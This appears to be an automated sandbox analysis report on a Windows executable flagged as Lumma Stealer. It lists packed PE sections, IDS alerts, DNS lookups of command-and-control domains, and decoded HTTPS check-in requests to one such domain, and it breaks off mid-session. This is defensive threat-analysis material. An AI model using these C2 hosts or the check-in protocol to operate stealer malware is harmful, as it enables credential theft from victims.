                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            0x10000x580000x27e0084a61f41378c44412f44085606263fb2False0.9979121767241379data7.97049232338871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x590000x3400x400914cd139a383496d0085d499d138ef92False0.390625data4.997389973748798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            dxfnwksx0x5b0000x2b70000x2b640053b25ec0cbbba82b21982cb8c3b6fc5funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            neetjkms0x3120000x10000x600fb633b4693f21eade42b562645994509False0.5794270833333334data5.057751739314365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .taggant0x3130000x30000x2200164176864edcc0909ad98df9ae72ac41False0.06870404411764706DOS executable (COM)0.748878353315706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_MANIFEST0x590580x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397

                                                                            Imports

                                                                            DLLImport
                                                                            kernel32.dlllstrcpy

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-10-31T17:26:02.774640+01002057131ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)1192.168.2.5609471.1.1.153UDP
                                                                            2024-10-31T17:26:02.797778+01002057129ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)1192.168.2.5559271.1.1.153UDP
                                                                            2024-10-31T17:26:02.812763+01002057127ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)1192.168.2.5622871.1.1.153UDP
                                                                            2024-10-31T17:26:02.824202+01002057125ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)1192.168.2.5562171.1.1.153UDP
                                                                            2024-10-31T17:26:02.837665+01002057123ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)1192.168.2.5519001.1.1.153UDP
                                                                            2024-10-31T17:26:03.499606+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549704188.114.97.3443TCP
                                                                            2024-10-31T17:26:03.499606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704188.114.97.3443TCP
                                                                            2024-10-31T17:26:04.312757+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704188.114.97.3443TCP
                                                                            2024-10-31T17:26:04.312757+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704188.114.97.3443TCP
                                                                            2024-10-31T17:26:05.047853+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549705188.114.97.3443TCP
                                                                            2024-10-31T17:26:05.047853+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705188.114.97.3443TCP
                                                                            2024-10-31T17:26:06.296342+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705188.114.97.3443TCP
                                                                            2024-10-31T17:26:06.296342+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705188.114.97.3443TCP
                                                                            2024-10-31T17:26:07.427537+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549706188.114.97.3443TCP
                                                                            2024-10-31T17:26:07.427537+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706188.114.97.3443TCP
                                                                            2024-10-31T17:26:09.643578+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549707188.114.97.3443TCP
                                                                            2024-10-31T17:26:09.643578+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707188.114.97.3443TCP
                                                                            2024-10-31T17:26:10.884020+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549707188.114.97.3443TCP
                                                                            2024-10-31T17:26:11.826936+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549708188.114.97.3443TCP
                                                                            2024-10-31T17:26:11.826936+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708188.114.97.3443TCP
                                                                            2024-10-31T17:26:14.841620+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549709188.114.97.3443TCP
                                                                            2024-10-31T17:26:14.841620+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709188.114.97.3443TCP
                                                                            2024-10-31T17:26:16.600929+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549710188.114.97.3443TCP
                                                                            2024-10-31T17:26:16.600929+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710188.114.97.3443TCP
                                                                            2024-10-31T17:26:18.763888+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549713188.114.97.3443TCP
                                                                            2024-10-31T17:26:18.763888+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713188.114.97.3443TCP
                                                                            2024-10-31T17:26:19.694593+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.549711TCP
                                                                            2024-10-31T17:26:58.088523+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.549910TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 31, 2024 17:26:02.868242025 CET49704443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:02.868285894 CET44349704188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:02.868356943 CET49704443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:02.874391079 CET49704443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:02.874404907 CET44349704188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:03.499475956 CET44349704188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:03.499605894 CET49704443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:03.511753082 CET49704443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:03.511776924 CET44349704188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:03.512489080 CET44349704188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:03.560486078 CET49704443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:03.823069096 CET49704443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:03.823096037 CET49704443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:03.823203087 CET44349704188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:04.312762022 CET44349704188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:04.312850952 CET44349704188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:04.312920094 CET49704443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:04.314589977 CET49704443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:04.314604998 CET44349704188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:04.314623117 CET49704443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:04.314629078 CET44349704188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:04.420149088 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:04.420203924 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:04.420301914 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:04.420711040 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:04.420723915 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:05.047703981 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:05.047852993 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:05.049293041 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:05.049305916 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:05.049532890 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:05.050781965 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:05.050808907 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:05.050846100 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.295828104 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.295861006 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.295933008 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.295990944 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.298738003 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.298765898 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.298794031 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.298815012 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.298883915 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.300587893 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.302227020 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.302249908 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.302269936 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.302277088 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.302349091 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.412525892 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.414377928 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.414418936 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.414447069 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.414463043 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.414484024 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.414506912 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.414551973 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.414612055 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.428919077 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.428958893 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.428992987 CET49705443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.429007053 CET44349705188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.818850040 CET49706443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.818897009 CET44349706188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:06.818979025 CET49706443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.819303036 CET49706443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:06.819319010 CET44349706188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:07.427362919 CET44349706188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:07.427536964 CET49706443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:07.429143906 CET49706443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:07.429157019 CET44349706188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:07.429416895 CET44349706188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:07.431004047 CET49706443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:07.431170940 CET49706443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:07.431194067 CET44349706188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:08.933825016 CET44349706188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:08.933919907 CET44349706188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:08.934010029 CET49706443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:08.934178114 CET49706443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:08.934195042 CET44349706188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:09.035737991 CET49707443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:09.035778999 CET44349707188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:09.035851002 CET49707443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:09.036222935 CET49707443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:09.036240101 CET44349707188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:09.643498898 CET44349707188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:09.643578053 CET49707443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:09.645777941 CET49707443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:09.645787954 CET44349707188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:09.646053076 CET44349707188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:09.648694038 CET49707443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:09.648827076 CET49707443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:09.648852110 CET44349707188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:09.648905039 CET49707443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:09.648910999 CET44349707188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:10.884015083 CET44349707188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:10.884095907 CET44349707188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:10.884151936 CET49707443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:10.884283066 CET49707443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:10.884299040 CET44349707188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:11.214601994 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:11.214654922 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:11.214771986 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:11.215162992 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:11.215179920 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:11.826829910 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:11.826936007 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:11.828630924 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:11.828644991 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:11.828877926 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:11.830250025 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:11.830403090 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:11.830425978 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:11.830506086 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:11.830516100 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:13.601711035 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:13.601805925 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:13.601902962 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:13.602401972 CET49708443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:13.602427006 CET44349708188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:14.209487915 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.209518909 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:14.209606886 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.209944010 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.209954977 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:14.841450930 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:14.841619968 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.843786001 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.843792915 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:14.843992949 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:14.847901106 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.848609924 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:14.848614931 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:15.568778992 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:15.568859100 CET44349709188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:15.569092989 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:15.569120884 CET49709443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.002660036 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.002763033 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.002859116 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.003217936 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.003252983 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.600806952 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.600929022 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.602370977 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.602386951 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.602600098 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.603929996 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.604696035 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.604736090 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.604887009 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.604926109 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.605074883 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.605135918 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.605329037 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.605365992 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.605597973 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.605642080 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.605868101 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.605905056 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.605930090 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.605957985 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.606065989 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.606102943 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.606152058 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.606268883 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.606307983 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.615008116 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.615274906 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.615338087 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:16.615379095 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.615487099 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:16.621104956 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:18.493678093 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:18.493781090 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:18.493856907 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:18.493937016 CET49710443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:18.493977070 CET44349710188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:18.521296978 CET49713443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:18.521336079 CET44349713188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:18.521409988 CET49713443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:18.521745920 CET49713443192.168.2.5188.114.97.3
                                                                            Oct 31, 2024 17:26:18.521760941 CET44349713188.114.97.3192.168.2.5
                                                                            Oct 31, 2024 17:26:18.763887882 CET49713443192.168.2.5188.114.97.3

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 31, 2024 17:26:02.774640083 CET6094753192.168.2.51.1.1.1
                                                                            Oct 31, 2024 17:26:02.790278912 CET53609471.1.1.1192.168.2.5
                                                                            Oct 31, 2024 17:26:02.797777891 CET5592753192.168.2.51.1.1.1
                                                                            Oct 31, 2024 17:26:02.809257030 CET53559271.1.1.1192.168.2.5
                                                                            Oct 31, 2024 17:26:02.812762976 CET6228753192.168.2.51.1.1.1
                                                                            Oct 31, 2024 17:26:02.822554111 CET53622871.1.1.1192.168.2.5
                                                                            Oct 31, 2024 17:26:02.824202061 CET5621753192.168.2.51.1.1.1
                                                                            Oct 31, 2024 17:26:02.834779024 CET53562171.1.1.1192.168.2.5
                                                                            Oct 31, 2024 17:26:02.837665081 CET5190053192.168.2.51.1.1.1
                                                                            Oct 31, 2024 17:26:02.850158930 CET53519001.1.1.1192.168.2.5

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Oct 31, 2024 17:26:02.774640083 CET192.168.2.51.1.1.10xefdcStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 17:26:02.797777891 CET192.168.2.51.1.1.10x999aStandard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 17:26:02.812762976 CET192.168.2.51.1.1.10x6f0dStandard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 17:26:02.824202061 CET192.168.2.51.1.1.10x5270Standard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 17:26:02.837665081 CET192.168.2.51.1.1.10x1410Standard query (0)necklacedmny.storeA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Oct 31, 2024 17:26:02.790278912 CET1.1.1.1192.168.2.50xefdcName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 17:26:02.809257030 CET1.1.1.1192.168.2.50x999aName error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 17:26:02.822554111 CET1.1.1.1192.168.2.50x6f0dName error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 17:26:02.834779024 CET1.1.1.1192.168.2.50x5270Name error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 17:26:02.850158930 CET1.1.1.1192.168.2.50x1410No error (0)necklacedmny.store188.114.97.3A (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 17:26:02.850158930 CET1.1.1.1192.168.2.50x1410No error (0)necklacedmny.store188.114.96.3A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • necklacedmny.store

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.549704188.114.97.34431532C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 16:26:03 UTC265OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 16:26:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                            Data Ascii: act=life
                                                                            2024-10-31 16:26:04 UTC1011INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 16:26:04 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=2pudb78rap6b38qoip3ms2s69t; expires=Mon, 24-Feb-2025 10:12:43 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wjdJTI3Nh5VCc8q9qw6sEHizGQNNX66fsX6FIOURj5DHlX5wBgaUhndjQZB5byRRAlKi88ZQPjaGIJt6IZxROVGmASL5Jrfbzp54WHRM%2BVDiRz1uZLjQCzLfX2ra5A3n%2BAZj99s%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db5012e5e29e70e-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1086&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=2562831&cwnd=251&unsent_bytes=0&cid=f1bfcce431b669ac&ts=831&x=0"
                                                                            2024-10-31 16:26:04 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                            Data Ascii: 2ok
                                                                            2024-10-31 16:26:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.549705188.114.97.34431532C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 16:26:05 UTC266OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
